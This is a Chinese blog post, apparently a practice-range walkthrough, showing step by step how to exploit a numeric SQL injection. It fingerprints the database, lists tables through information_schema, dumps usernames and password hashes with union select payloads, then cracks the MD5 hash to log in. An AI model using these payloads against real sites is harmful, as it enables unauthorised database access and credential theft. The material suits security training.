标签:word md5 思路 用户 查看 登录系统 版本 连接数 pass
sql注入思路:
1. id=1 正常
id=1‘ 错误
and 1=1 and 1=2
说明存在数字型注入
2、猜字段数
union select 1
union select 1,2
....
union select 1,2,3,4 返回正常页面
说明 该表中有4个字段
3.查询相关内容
位置插入的预设函数;
user() 查看用户
database() --查看数据库名称
version() --查看数据库版本
@@datadir --数据库路径
@@version_compile_os--操作系统版本
system_user() --系统用户名
current_user()--当前用户名
session_user()--连接数据库的用户名
id=-1 union select 1,2,database(),4
得到数据库名为mozhe_discuz_stormgroup
查询数据库mozhe_discuz_stormgroup中的表
id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=‘mozhe_discuz_stormgroup‘
得到stormgroup_member,notice
查看stormgroup_member字段:
id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘stormgroup_member‘
id,name,password,status
查看notice 字段:
id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘notice‘
id,title,content,time
我们要的数据在stormgroup_member表里面:
id=-1 union select 1,concat(name,password),4 from stormgroup_member
查询数据
id=-1 union select 1,concat(name,‘-‘,password,‘-‘,status),3,4 from stormgroup_member
密码 md5 解密:
登录系统 得到key
标签:word md5 思路 用户 查看 登录系统 版本 连接数 pass
原文地址:https://www.cnblogs.com/WhiteHatKevil/p/10080090.html